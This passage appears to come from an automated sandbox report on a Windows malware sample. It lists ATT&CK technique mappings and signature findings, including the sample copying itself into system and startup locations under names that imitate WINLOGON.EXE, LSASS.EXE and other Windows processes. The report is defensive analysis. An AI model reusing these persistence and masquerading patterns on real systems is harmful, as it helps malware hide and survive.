Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 4, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Change Default File Association", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Screensaver", "attck_id": "T1546.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "malicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location %WINDIR%\\D3_08.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location C:\\D3_08.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location %WINDIR%\\D3_08.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location C:\\D3_08.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.scr to new location %WINDIR%\\D3_08.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.scr to new location C:\\D3_08.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CopyFileA\" to copy C:\\\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00003404)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4D17.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE48F7.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrD3_08.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4660.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE4804.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"services.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], 